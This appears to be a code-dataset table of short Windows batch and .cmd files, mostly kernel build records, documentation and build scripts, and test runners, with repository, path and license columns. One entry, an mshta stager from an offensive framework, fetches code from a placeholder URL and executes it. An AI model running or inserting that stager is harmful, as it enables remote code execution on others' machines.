code stringlengths 3 1.03M | repo_name stringlengths 5 84 | path stringlengths 4 233 | language stringclasses 1
value | license stringclasses 15
values | size int32 3 1.03M |
|---|---|---|---|---|---|
cmd_net/ipv4/tcp_westwood.ko := /home/livlogik/android/ndk/android-ndk-r10e/toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld -EL -r -T /home/livlogik/Git_Hub/Vivid_Logik_Kernel_v1/scripts/module-common.lds --build-id --fix-cortex-a53-843419 -o net/ipv4/tcp_westwood.ko net/ipv4/... | livlogik/Evil_Yummy_Gumdrop--Tmo-V10-Kernel | net/ipv4/.tcp_westwood.ko.cmd | bat | gpl-2.0 | 363 |
del .\bin\i386\stdrv01.sys
del .\objfre_win7_x86\i386\*.obj
del .\bin\i386\stdrv01.pdb
ren .\bin\i386\stdrv01.pdb %random%
set WXPBASE=s:\winddk
ddkbuild.cmd -WXP fre .
| 44670/BSODStyle | src/mybuild.bat | bat | gpl-2.0 | 169 |
@echo off
call %~dp0\set_path_variables
SETLOCAL ENABLEDELAYEDEXPANSION
echo BUILDLOG %DATE%_%TIME% >build.log
echo ====================== >>build.log
if not exist temp mkdir temp
FOR %%x IN (*.xml) DO (
set filename=%%x
set modelname=!filename:~0,-4!
echo **** generating logical tex:
echo ... | JohnWCartmell/ERmodelSeries1 | scripts/genAllLogicalAndPhysicalTex.bat | bat | gpl-3.0 | 1,158 |
@ECHO OFF
REM @Exclude true
cmd.exe
| MarijnStevens/BatchRunner | Scripts/cmd.bat | bat | gpl-3.0 | 36 |
@call ..\sdk\setenv.bat
sjasmplus firmware.asm
zx7b firmware_strings.rom firmware.rom.zx7b
sjasmplus bootloader.asm
bin2hex bootloader.rom
copy /y bootloader.hex ..\cores\Spectrum\bootloader_hex.txt
| antoniovillena/zxuno | firmware/firmloader.bat | bat | gpl-3.0 | 200 |
echo off
rem throw the first parameter away by shift, which is "gush"
shift
set param1=%0
shift
set params=%0
:loop
shift
if [%0]==[] goto afterloop
set params=%params% %0
goto loop
:afterloop
git add -A
git commit -S -m "%params%"
git push origin "%param1%"
| sansna/windows.bat | gush.bat | bat | lgpl-3.0 | 278 |
set OPTS=/Zi /Oy- /MD /DDEBUG
set OPTS=/Ox /Oy /MT /DNDEBUG
cl /Fegml.exe *.c -I linenoise -DGML_COMPILER="vs2015" -DGML_OS="%OS%" -DGML_TYPE="\"development\"" linenoise\linenoise.c linenoise\utf8.c %OPTS%
del *.obj | r-lyeh/scriptorium | gml/make.bat | bat | unlicense | 218 |
.nuget\NuGet Update -self
.nuget\NuGet pack T4TS.nuspec -Prop Configuration=Release -IncludeReferencedProjects | lionsoft/t4ts | NuGet_pack.bat | bat | apache-2.0 | 110 |
@pushd "%~dp0" || exit /b 1
rmdir /S /Q bin
rmdir /S /Q obj
rmdir /S /Q libMmkDebugStack\build\native\lib
| MaulingMonkey/libMmkDebugStack | Cleanup.cmd | bat | apache-2.0 | 106 |
@echo off
set JAVA_HOME=D:\Program Files\java\jdk1.5.0_15
set PATH="%JAVA_HOME%\bin";%PATH%
set LINENOISE4JAVA_VERSION=0.1
set CLASSPATH=.\lib\commons-io-2.2.jar
set CLASSPATH=%CLASSPATH%;.\lib\hamcrest-core-1.3.jar
set CLASSPATH=%CLASSPATH%;.\lib\jna-3.5.2.jar
set CLASSPATH=%CLASSPATH%;.\lib\junit-4.11.ja... | wangzhengbo/Linenoise4Java | runTest.bat | bat | apache-2.0 | 873 |
if exist EXPERT.exe call EXPERT.exe e -o
if exist GepInstall.exe call GepInstall.exe e -o
call ep_regsvr32 @A_Deve_27.reg.txt
if exist EP_ComponentCmdsRegSvr.exe call EP_ComponentCmdsRegSvr.exe EP_ComponentCmdsLibBase.EPW4_Cathegory_Components
call ep_regsvr32 @nex4_all.reg.txt
call ep_regsvr32.exe Esa.exe
call e... | mivuna/D27_Bekaert | esa_reg.bat | bat | apache-2.0 | 378 |
cmd_kmemporting.a = ar crus kmemporting.a subr_kmem.o
| vadimsu/netbsd_dpdk_port | netbsd/porting/kmem/build/.kmemporting.a.cmd | bat | bsd-2-clause | 55 |
python "%~dp0\renderchan" %*
| scribblemaniac/RenderChan | bin/renderchan.bat | bat | bsd-3-clause | 29 |
copy E:\opencv2.4.0\build\x64\vc10\bin\*.dll .
copy E:\opencv2.4.0\build\common\tbb\intel64\vc10\*.dll .
| Melevir/stasm | vc10x64/copydlls.bat | bat | bsd-3-clause | 107 |
@erase lang.inc
@echo lang fix ru >lang.inc
@fasm midiplay.asm midiplay
@erase lang.inc
@pause | devlato/kolibrios-llvm | programs/media/midiplay/trunk/build_ru.bat | bat | mit | 94 |
@echo off
if not exist bin mkdir bin
fasm -m 65536 kernel.asm bin\kernel.mnt
pause
exit 0 | devlato/kolibrios-llvm | kernel/branches/Kolibri-A/trunk/bld.bat | bat | mit | 97 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_MEETS.S03_MeetingFromICal.MSMEETS_S03_TC06_UpdateMeetingFromICalWithInvalidAttendees /testcontainer:..\..\MS-MEETS\TestSuite\bin\Debug\MS-MEETS_TestSuite.dll /runconfig:..\..\MS-MEETS\MS-MEETS.testsettings /unique
pause | XinwLi/Interop-TestSuites-1 | SharePoint/Source/Scripts/MS-MEETS/RunMSMEETS_S03_TC06_UpdateMeetingFromICalWithInvalidAttendees.cmd | bat | mit | 313 |
@echo OFF
rem **************************************************************************
rem (C) Copyright IBM Corp. 2014
rem
rem LICENSE: Eclipse Public License v1.0
rem http://www.eclipse.org/legal/epl-v10.html
rem **************************************************************************
rem ***********************... | acshea/edgware | fabric.scripts/win32/license.bat | bat | epl-1.0 | 1,349 |
cmd_scripts/kconfig/zconf.tab.o := gcc -Wp,-MD,scripts/kconfig/.zconf.tab.o.d -Wall -Wmissing-prototypes -Wstrict-prototypes -O3 -fomit-frame-pointer -DCURSES_LOC="<curses.h>" -DLOCALE -Iscripts/kconfig -c -o scripts/kconfig/zconf.tab.o scripts/kconfig/zconf.tab.c
deps_scripts/kconfig/zconf.tab.o := \
scripts/kco... | MadManA/MadKernel_cooper | scripts/kconfig/.zconf.tab.o.cmd | bat | gpl-2.0 | 4,095 |
echo Building MapLibSymbian
bldmake bldfiles @UIQ21
abld build cw_ide @UIQ21
echo DONE!
| wayfinder/Wayfinder-S60-Navigator | CPP/Targets/MapLib/Symbian/uiq21/make_cw_ide.bat | bat | bsd-3-clause | 96 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "hel... | lchsk/django-mongonaut | docs/make.bat | bat | mit | 4,126 |
cmd_drivers/input/mouse/built-in.o := arm-eabi-ld -EL -r -o drivers/input/mouse/built-in.o drivers/input/mouse/psmouse.o
| BigBot96/android_kernel_samsung_espressovzw | drivers/input/mouse/.built-in.o.cmd | bat | gpl-2.0 | 126 |
%~dp0\Deploy.cmd v2.0.50727 %1 | jkowalski/NLog | tests/NLog.ComInteropTests/Deploy.netfx35.cmd | bat | bsd-3-clause | 30 |
%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild Build.proj /t:RunTests /p:IsDesktopBuild=true
pause | sharparchitecture/Sharp-Architecture-Contrib | Build/BuildAndTest.cmd | bat | bsd-3-clause | 103 |
cd ..
del/q scite.zip
zip scite.zip scintilla\*.* scintilla\*\*.* scintilla\*\*\*.* scintilla\*\*\*\*.* scintilla\*\*\*\*\*.* scite\*.* scite\*\*.* scite\*\*\*.* scite\*\*\*\*.* -x *.o -x *.obj -x *.lib -x *.dll -x *.exe -x *.pdb -x *.i -x *.d -x *.res -x *.exp -x *.ncb -x *.sbr -x *.bsc -x *.tlog -x *.ilk -x *.ipch -x... | LuaDist/scite | zipsrc.bat | bat | isc | 369 |
rem Validations shared by link-sample-program-msvc.bat and
rem link-sample-program-mingw.bat
echo off
rem Notice that the dll goes in "bin".
set DLL=%INSTALL_DIR%\bin\mongoc-1.0.dll
set LIB_DLL=%INSTALL_DIR%\bin\libmongoc-1.0.dll
set LIB_LIB=%INSTALL_DIR%\lib\libmongoc-1.0.lib
if "%MINGW%"=="1" (
if not exist %LIB_... | rcsanchez97/mongo-c-driver | .evergreen/check-installed-files.bat | bat | apache-2.0 | 1,639 |
REM INSTALL THIS WINDOWS SERVICE:
REM 1. Build in Release mode
SET INSTALL_UTL="C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe"
%INSTALL_UTL% bin\Release\WinServiceAppHost.exe
| zhaokunfay/ServiceStack.Examples | src/StarterTemplates/WinServiceAppHost/install.bat | bat | bsd-3-clause | 196 |
@ECHO OFF
PUSHD %~dp0\..
CALL make-mingwlibs.bat %*
POPD
| pokowaka/xbmc | tools/buildsteps/windows/win32/make-mingwlibs.bat | bat | gpl-2.0 | 58 |
set MATLAB=C:\Program Files\MATLAB\R2017a
"C:\PROGRA~1\MATLAB\R2017a\bin\win64\gmake" -f untitled.mk ISPROTECTINGMODEL=NOTPROTECTING EXTMODE_STATIC_ALLOC=0 EXTMODE_STATIC_ALLOC_SIZE=1000000 TMW_EXTMODE_TESTING=0 OPTS="-DTGTCONN -DON_TARGET_WAIT_FOR_START=0"
| skgadi/Programming | MATLAB/untitled_sldrt_win64/untitled.bat | bat | mit | 259 |
del /F /A /Q ./JS/*
del /F /A /Q ./Php/*
del /F /A /Q ./Python/*
del /F /A /Q ./Java/*
protoc.exe -I=./Protocol --python_out=./Python ./Protocol/game.proto
protoc.exe -I=./Protocol --java_out=./Java ./Protocol/game.proto
protoc.exe -I=./Protocol --php_out=./Php ./Protocol/game.proto
protoc.exe --js_out=library=game_pb... | pengzhuo/gameServer | Protocol/createProtobuf.bat | bat | mit | 427 |
@echo off
"%PREFIX%\Scripts\jupyter-nbextension.exe" enable exdir --py --sys-prefix >> "%PREFIX%\.messages.txt" 2>&1 && if errorlevel 1 exit 1
| CINPLA/exdir | .conda-recipe/post-link.bat | bat | mit | 144 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
... | Ravenm/2143-OOP-NASH | docs/make.bat | bat | cc0-1.0 | 6,989 |
cmd_drivers/i2c/busses/built-in.o := /opt/freescale/usr/local/gcc-4.6.2-glibc-2.13-linaro-multilib-2011.12/fsl-linaro-toolchain/bin/arm-none-linux-gnueabi-ld -EL -r -o drivers/i2c/busses/built-in.o drivers/i2c/busses/i2c-imx.o
| FEDEVEL/tmp-imx6-tiny-rex-linux | drivers/i2c/busses/.built-in.o.cmd | bat | gpl-2.0 | 232 |
@echo off
FORFILES /P %WINDIR%\servicing\Packages /M Microsoft-Windows-InternetExplorer-*9.*.mum /c "cmd /c start /w pkgmgr /up:@fname /norestart"
FORFILES /P %WINDIR%\servicing\Packages /M Microsoft-Windows-InternetExplorer-*9.*.mum /c "cmd /c start /w pkgmgr /up:@fname /norestart"
pushd %~dp0
start "" cmd /c ... | therealadaam/ps_stuff | working/Uninstall IE9_withRebootNag.bat | bat | gpl-2.0 | 341 |
cmd_/home/keithconger/Projects/bbbandroid-bluez/backports-3.18.1-1/drivers/bluetooth/ath3k.ko := /home/keithconger/Projects/bbbandroid-bluez/prebuilts/gcc/linux-x86/arm/arm-gnueabihf-4.7/bin/arm-linux-gnueabihf-ld -EL -r -T /home/keithconger/Projects/bbbandroid-bluez/kernel/scripts/module-common.lds --build-id -o /ho... | kconger/backports-3.18.1-1 | drivers/bluetooth/.ath3k.ko.cmd | bat | gpl-2.0 | 589 |
cmd_drivers/base/platform.o := arm-eabi-gcc -Wp,-MD,drivers/base/.platform.o.d -nostdinc -isystem /usr/bin/../lib/gcc/arm-eabi/4.5.0/include -Iinclude -I/home/jacob/source/wildfire-kernel/arch/arm/include -include include/linux/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-msm/include -Wall -Wundef -Wstrict... | HCDRJacob/wildfire-kernel | drivers/base/.platform.o.cmd | bat | gpl-2.0 | 144,426 |
@echo off
set CPH=./bin;./lib/jopt-simple-4.8.jar
set DTA=data\N4C3W4_T.BPP
set HEU=-n
java -classpath %CPH% com.heuristique.tests.TestBinPack -d %DTA% -n
java -classpath %CPH% com.heuristique.tests.TestBinPack -d %DTA% -n -t
java -classpath %CPH% com.heuristique.tests.TestBinPack -d %DTA% -f
java -classpath... | edgd1er/M1S1_INFO | S1_ACT/ACT_TP10/run_java.bat | bat | gpl-2.0 | 518 |
cmd_fs/proc/proc_net.o := gcc -Wp,-MD,fs/proc/.proc_net.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/4.8/include -D__KERNEL__ -Iinclude -include include/linux/autoconf.h -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Os -Wframe-larger-t... | namgk/kernel-tut | fs/proc/.proc_net.o.cmd | bat | gpl-2.0 | 19,255 |
cmd_sound/isa/gus/built-in.o := rm -f sound/isa/gus/built-in.o; /home/envy/kernel/android_toolchains/arm-eabi-linaro-4.6.2/bin/arm-eabi-ar rcsD sound/isa/gus/built-in.o
| Envious-Data/shinano-sirius_msm8974abpro | sound/isa/gus/.built-in.o.cmd | bat | gpl-2.0 | 170 |
isim batch on;
run all;
quit;
| mistryalok/FPGA | Xilinx/ISE/Basics/T_flipflop/genExpectedResults.cmd | bat | gpl-3.0 | 33 |
"c:\Program Files\MySQL\MySQL Server 5.7\bin\mysqldump.exe" --user=root --host=localhost --password="PASSWORD" "DATABASE" > DATABASE-%DATE:~7,2%.sql
"c:\Program Files\MySQL\MySQL Server 5.7\bin\mysql.exe" -u root -h localhost --password="PASSWORD" -B < DATABASE-maint.sql
"C:\Program Files\7-Zip\7z.exe" a DATABASE-%DA... | InternetworkConsultingLLC/incAccounting | Documentation/Backups/backup.bat | bat | gpl-3.0 | 602 |
start DLL/ji3.exe
| goeb/ji3 | ji3.bat | bat | gpl-3.0 | 19 |
@echo off
REM Copyright (c) 2014-2016 Martin Raiber
REM
REM Permission is hereby granted, free of charge, to any person obtaining a
REM copy of this software and associated documentation files (the
REM "Software"), to deal in the Software without restriction, including
REM without limitation the rights to u... | uroni/urbackup_backend | urbackupclient/backup_scripts/list.bat | bat | agpl-3.0 | 1,297 |
@ECHO OFF
SET root=%~dp0
CD /D %root%
CLS
ECHO 1.Download Latest Build
ECHO 2.Download Stable Build
ECHO 3.Run NadekoBot (normally)
ECHO 4.Run NadekoBot with Auto Restart (check "if" nadeko is working properly, before using this)
ECHO 5.To exit
ECHO.
CHOICE /C 12345 /M "Enter your choice:"
:: Note - list ERRORLEVEL... | rumlefisk/NadekoBot | NadekoInstaller.bat | bat | unlicense | 2,175 |
@echo off
yasm bios.asm -o bios.bin
| reenigne/reenigne | 8088/bios/build.bat | bat | unlicense | 36 |
@title Logging Hub
@cd /d %~dp0
call mvn -e exec:java -Dexec.mainClass="com.logginghub.logging.launchers.RunHub" -Dexec.args="%%classpath"
pause | logginghub/core | logginghub-server/runHub.bat | bat | apache-2.0 | 151 |
REM Excerpted from "Kotlin and Android Development featuring Jetpack",
REM published by The Pragmatic Bookshelf.
REM Copyrights apply to this code. It may not be used to create training material,
REM courses, books, articles, and the like. Contact us if you are in doubt.
REM We make no guarantees that this code is fit... | hermantai/samples | kotlin/kotlin-and-android-development-featuring-jetpack/abl-api-client/gradlew.bat | bat | apache-2.0 | 3,102 |
@echo off
REM GREEN BATCH FILE TEMPLATE <you can replace this line with new bat desc>
REM VERSION 0.0.2.1
REM Last updated by greenlaw110@gmail.com at Nov-5-2007
REM created by greenlaw110@gmail.com at some time 2006
setlocal & pushd
if {%1}=={} goto _HELP
if {%1}=={-h} goto _HELP
if {%1}=={--help} goto _HELP
if ex... | greenlaw110/winenv | tbin/tsdate.bat | bat | bsd-2-clause | 958 |
@echo off
SET VERBOSE=
IF /I "%~1"=="/V" SET VERBOSE=T
IF /I "%~2"=="/V" SET VERBOSE=T
IF /I "%~3"=="/V" SET VERBOSE=T
ECHO.
ECHO MapDrive v1.2, Eric Menze 2014
ECHO ==============================
IF DEFINED VERBOSE ECHO Parameter 1: %1
IF DEFINED VERBOSE ECHO Parameter 2: %2
IF DEFINED VERBOSE ECHO Parameter 3: %3
... | Ehryk/ContextMenuTools | Custom Installs/Map Local Drive Here/mapdrive.bat | bat | bsd-3-clause | 2,590 |
git status
git commit -a
git push origin master
git status
| fabulias/coimco_backend | vendor/github.com/kimxilxyong/gorp/commit.bat | bat | mit | 59 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_OXCFOLD.S01_FolderRopOperations.MSOXCFOLD_S01_TC06_RopDeleteFolderWithDelMessages /testcontainer:..\..\MS-OXCFOLD\TestSuite\bin\Debug\MS-OXCFOLD_TestSuite.dll /runconfig:..\..\MS-OXCFOLD\MS-OXCFOLD.testsettings /unique
pause | XinwLi/Interop-TestSuites-1 | ExchangeMAPI/Source/Scripts/MS-OXCFOLD/RunMSOXCFOLD_S01_TC06_RopDeleteFolderWithDelMessages.cmd | bat | mit | 318 |
cmd_drivers/block/loop.mod.o := /opt/buildroot-gcc342/bin/mipsel-linux-uclibc-gcc -Wp,-MD,drivers/block/.loop.mod.o.d -nostdinc -isystem /root/asuswrt-bender/tools/brcm/K26/hndtools-mipsel-uclibc-4.2.4/bin/../lib/gcc/mipsel-linux-uclibc/4.2.4/include -D__KERNEL__ -Iinclude -include include/linux/autoconf.h -Wall -Wun... | matteocrippa/dsl-n55u-bender | release/src-ra/linux/linux-2.6.21.x/drivers/block/.loop.mod.o.cmd | bat | gpl-2.0 | 11,950 |
cmd_sound/pci/ac97/built-in.o := rm -f sound/pci/ac97/built-in.o; arm-linux-gnueabihf-ar rcsD sound/pci/ac97/built-in.o
| tyeo098/MK908-Kernel-NAND | sound/pci/ac97/.built-in.o.cmd | bat | gpl-2.0 | 121 |
cmd_/root/Desktop/scst-2.2.0/src/dev_handlers/scst_tape.ko := cp /root/Desktop/scst-2.2.0/src/dev_handlers/scst_tape.ko.unsigned /root/Desktop/scst-2.2.0/src/dev_handlers/scst_tape.ko
| viclab/scst_cache | src/dev_handlers/.scst_tape.ko.cmd | bat | gpl-2.0 | 184 |
@echo off
set ASMJIT_SCRIPTS_DIR=%CD%
set ASMJIT_BUILD_DIR="build_vs2010_x86"
mkdir ..\%ASMJIT_BUILD_DIR%
cd ..\%ASMJIT_BUILD_DIR%
cmake .. -G"Visual Studio 10" -DASMJIT_BUILD_SAMPLES=1
cd %ASMJIT_SCRIPTS_DIR%
pause
| Swoorup/gta-maxout | SJLIB/dependencies/asmjit/asmjit/scripts/configure-win-vs2010-x86.bat | bat | gpl-3.0 | 219 |
mshta vbscript:Execute("on error resume next:Set x=CreateObject(""WinHttp.WinHttpRequest.5.1""):x.open""GET"",""~URL~"",false:x.send:Execute x.responseText")(window.close)
| TheNaterz/koadic | data/stager/vbscript/mshta.cmd | bat | apache-2.0 | 172 |
"c:\Program Files (x86)\WiX Toolset v3.14\bin\candle.exe" MyWixUI_InstallDir.wxs
"c:\Program Files (x86)\WiX Toolset v3.14\bin\candle.exe" minutor.wxs
"c:\Program Files (x86)\WiX Toolset v3.14\bin\light.exe" -ext WixUIExtension -o minutor.msi minutor.wixobj MyWixUI_InstallDir.wixobj
@pause
| mrkite/minutor | make_installer.bat | bat | bsd-2-clause | 295 |
env = Environment(DOCBOOK_PREFER_XSLTPROC=1, tools=['docbook'])
env.DocbookSlidesHtml('virt')
| timj/scons | test/Docbook/basic/slideshtml/image/SConstruct.cmd | bat | mit | 95 |
@echo off
setlocal
for %%# in (/h /help -h -help) do (
if "%~1" equ "%%#" (
(echo()
echo %~nx0 - Displays LastModified,LastAccessed and DateCreated times of a given directory
echo in format YYYYMMDDhhmmss
(echo()
echo example:
echo call %~nx0 "C:\directory\"
)
)
if "%~1" equ "" (
echo no directo... | TheBigBear/batch.scripts | fileUtils/dirTimes.bat | bat | mit | 852 |
cmd_scripts/basic/hash := gcc -Wp,-MD,scripts/basic/.hash.d -Wall -Wmissing-prototypes -Wstrict-prototypes -O2 -fomit-frame-pointer -o scripts/basic/hash scripts/basic/hash.c
deps_scripts/basic/hash := \
scripts/basic/hash.c \
/usr/include/stdio.h \
/usr/include/features.h \
/usr/include/bits/predefs.h \... | jdlfg/Mecha-kernel-jdlfg | scripts/basic/.hash.cmd | bat | gpl-2.0 | 1,543 |
@if not defined _echo @echo off
setlocal EnableDelayedExpansion
set __ThisScriptShort=%0
if /i "%1" == "/?" goto HelpVarCall
if /i "%1" == "-?" goto HelpVarCall
if /i "%1" == "/h" goto HelpVarCall
if /i "%1" == "-h" goto HelpVarCall
if /i "%1" == "/help" goto HelpVarCall
if /i "%1" == "-help" goto HelpVar... | gregkalapos/corert | buildscripts/build-packages.cmd | bat | mit | 871 |
del libmgcc.a
md libgcc
cd libgcc
@rem C:\Espressif\xtensa-lx106-elf\bin\xtensa-lx106-elf-ar x C:\Espressif\xtensa-lx106-elf\lib\gcc\xtensa-lx106-elf\4.8.2\libgcc.a
C:\Espressif\xtensa-lx106-elf\bin\xtensa-lx106-elf-ar x C:\Espressif\xtensa-lx106-elf\lib\gcc\xtensa-lx106-elf\5.1.0\libgcc.a
@rem delete:
@rem _fixunsdfsi... | pvvx/esp8266web | lib200/new_libmgcc.bat | bat | unlicense | 745 |
fasm default.asm default.skn
pause | devlato/kolibrios-llvm | skins/win8/skn_build.bat | bat | mit | 34 |
set target=%1%
if "%target%" == "" (
echo.
echo Error: Target is not set.
exit 1
)
set arch=%2%
if "%arch%" == "" (
echo.
echo Error: Arch is not set.
exit 1
)
set deploydir=%cd%\..\..\..\deploy\win_%arch%
set exdir=%deploydir%\staff\samples\bin
if not EXIST %exdir% mkdir %exdir%
xcopy /Y... | gale320/staff | staff/samples/echo/custom_client_rest/deploy.cmd | bat | apache-2.0 | 347 |
del *.c
del *.ringo
del *.obj
del *buildvc.bat
del *buildgcc.sh
del *buildclang.sh
del *.exp
del *.lib
| ring-lang/ring | tools/ring2exe/cleartemp.bat | bat | mit | 103 |
@echo off
IF EXIST cloth.exp DEL /F cloth.exp
IF EXIST cloth.lib DEL /F cloth.lib
IF EXIST cloth.exe DEL /F cloth.exe
#nvcc -Xptxas -O3,-v -o cloth cloth.cu
nvcc -Xptxas -O3,-v -o cloth cloth.cu
cloth.exe
pause
IF EXIST cloth.exp DEL /F cloth.exp
IF EXIST cloth.lib DEL /F cloth.lib | CodedK/Cuda-animation-examples | cloth/compile.bat | bat | mit | 291 |
@echo off
set "VIRTUAL_ENV=C:\Users\Paul\Dropbox\MyMDb\venv"
if defined _OLD_VIRTUAL_PROMPT (
set "PROMPT=%_OLD_VIRTUAL_PROMPT%"
) else (
if not defined PROMPT (
set "PROMPT=$P$G"
)
set "_OLD_VIRTUAL_PROMPT=%PROMPT%"
)
set "PROMPT=(venv) %PROMPT%"
if not defined _OLD_VIRTUAL_PYTHONHOME (
set... | kiwicopple/MyMDb | venv/Scripts/activate.bat | bat | mit | 537 |
@IF EXIST "%~dp0\node.exe" (
"%~dp0\node.exe" "%~dp0\..\pkg-ok\bin.js" %*
) ELSE (
@SETLOCAL
@SET PATHEXT=%PATHEXT:;.JS;=;%
node "%~dp0\..\pkg-ok\bin.js" %*
) | GuilleBecker15/CustomFakeApi | node_modules/.bin/pkg-ok.cmd | bat | mit | 168 |
@echo OFF
| forged2form/cleantech-scripts | win/parse-cleanup.bat | bat | mit | 13 |
REM Generate the project docs website
copy README.md .\src\docfx\index.md
cd src\docfx
docfx metadata
docfx build
cd ..\.. | velyo/google-maps-services | docgen.cmd | bat | mit | 122 |
java -mx500m -cp "/C:/Users/Compaq 6910p/Documents/R/win-library/3.4/dismo/java/maxent.jar;C:/Users/Compaq 6910p/Documents/R/win-library/3.4/rJava/java/boot;C:\Users\Compaq 6910p\Documents\R\win-library\3.4\dismo\java;C:\Users\Compaq 6910p\Documents\R\win-library\3.4\dismo\java\dismo.jar;C:\Users\Compaq 6910p\Documents... | mauriciovancine/enm_r | data/temp/raster/maxent/1109571041039/species_explain.bat | bat | mit | 653 |
..\.nuget\NuGet.exe pack XamlingAzure.nuspec
pause | jakkaj/Xamling-Azure | nuget/CreatePackages.bat | bat | mit | 50 |
<?xml version="1.0"?>
<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<modelVersion>4.0.0</modelVersion>
<groupId>christian130</groupId>
<artifactId>chri... | christian130/Jshinny | ttt.bat | bat | cc0-1.0 | 7,909 |
IF NOT EXIST ..\config.bat GOTO noconfig
call ..\config.bat
if NOT "%CLEAN_SVN%"=="" MSDEV.COM subversion_msvc.dsw /MAKE "__ALL_TESTS__ - Win32 Release" /CLEAN
if ERRORLEVEL 1 EXIT 1
EXIT 0
:noconfig
echo File config.bat not found. Please copy it from config.bat.tmpl and tweak for you.
EXIT 2 | bdmod/extreme-subversion | BinarySourcce/subversion-1.6.17/tools/buildbot/slaves/xp-vc60-ia32/svnclean.bat | bat | gpl-2.0 | 306 |
cmd_fs/fat/fat.o := /pub/CIS520/usr/arm/bin/arm-angstrom-linux-gnueabi-ld -EL -r -o fs/fat/fat.o fs/fat/cache.o fs/fat/dir.o fs/fat/fatent.o fs/fat/file.o fs/fat/inode.o fs/fat/misc.o
| mjmccall/Kernel | fs/fat/.fat.o.cmd | bat | gpl-2.0 | 188 |
cmd_fs/proc/built-in.o := /home/sinxoner18/android/kernel/toolchains/arm-eabi-linaro-4.6.2/bin/arm-eabi-ld -EL -r -o fs/proc/built-in.o fs/proc/proc.o
| SinxOner/android_kernel_lge_p710 | fs/proc/.built-in.o.cmd | bat | gpl-2.0 | 156 |
cmd_sound/pci/rme9652/built-in.o := rm -f sound/pci/rme9652/built-in.o; /root/Kernel/toolchain/prebuilt/arm-eabi-4.4.3/bin/arm-eabi-ar rcs sound/pci/rme9652/built-in.o
| garwynn/D710SPR_GB27_Kernel | sound/pci/rme9652/.built-in.o.cmd | bat | gpl-2.0 | 169 |
cmd_arch/arm/lib/built-in.o := rm -f arch/arm/lib/built-in.o; /media/android_source/CyanogenMod/system/prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin/arm-eabi-ar rcs arch/arm/lib/built-in.o
| freebsdmax/gsmart1315_kernel | arch/arm/lib/.built-in.o.cmd | bat | gpl-2.0 | 192 |
@echo off
set PORT=11111
set WEBCONFIGDIR="D:\git\homemarket\HomeMarket"
cd /d %Programfiles%\IIS Express
start iisexpress /path:%HOMEDRIVE%\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles /vpath:/ASP.NETWebAdminFiles /port:%PORT% /clr:4.0 /ntlm
start "" "http://localhost:%PORT%/asp.netwebadminfile... | nevalenny/homemarket | web configuration tool.bat | bat | gpl-2.0 | 398 |
@echo off
cd ..
setlocal ENABLEDELAYEDEXPANSION
cmdwiz setfont 1 & cls & mode 180,80 & cmdwiz showcursor 0
for /F "Tokens=1 delims==" %%v in ('set') do set "%%v="
set /a XC=0, YC=0, XCP=8, YCP=5, MXC=600, MYC=0
set /a D1=2, D2=2, D3=2, D4=2
set /a BXA=6, BYA=4 & set /a BY=-!BYA!
set BALLS=""
cmdwiz setbuffersize 360 k... | misol1/cmdgfx | legacy/dot-flag2.bat | bat | gpl-2.0 | 2,340 |
runas /user:domain\user "psexec \\* -d -e -u domain\user -p password \\server\g$\logs\CWScanner.exe -accepteula" | 4D5A/CWScanner | CWScanner.bat | bat | gpl-2.0 | 112 |
cmd_fs/jbd/jbd.o := ../prebuilt/linux-x86/toolchain/arm-eabi-4.4.0/bin/arm-eabi-ld -EL -r -o fs/jbd/jbd.o fs/jbd/transaction.o fs/jbd/commit.o fs/jbd/recovery.o fs/jbd/checkpoint.o fs/jbd/revoke.o fs/jbd/journal.o
| venkatkamesh/2.6.35-kernel-for-lg-optimus-me- | fs/jbd/.jbd.o.cmd | bat | gpl-2.0 | 218 |
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" www.sweetheartsquad.com/scenario/service/dump_data
ping 127.0.0.1 -n 200 > nul
git checkout master
git checkout .
git pull origin master
git pull origin ee
git add --all
git commit -m "merge"
git pull origin ian
git add --all
git commit -m "merge"
git p... | SweetheartSquad/Game | scenarioSync.bat | bat | gpl-2.0 | 597 |
@rem $Id: lp386.bat,v 1.3 2002/02/21 21:49:28 giles Exp $
@gs386 -sDEVICE=djet500 -dNOPAUSE -- gslp.ps -fCourier9 %1 %2 %3 %4 %5 %6 %7 %8 %9
| brho/plan9 | sys/src/cmd/gs/lib/lp386.bat | bat | gpl-2.0 | 141 |
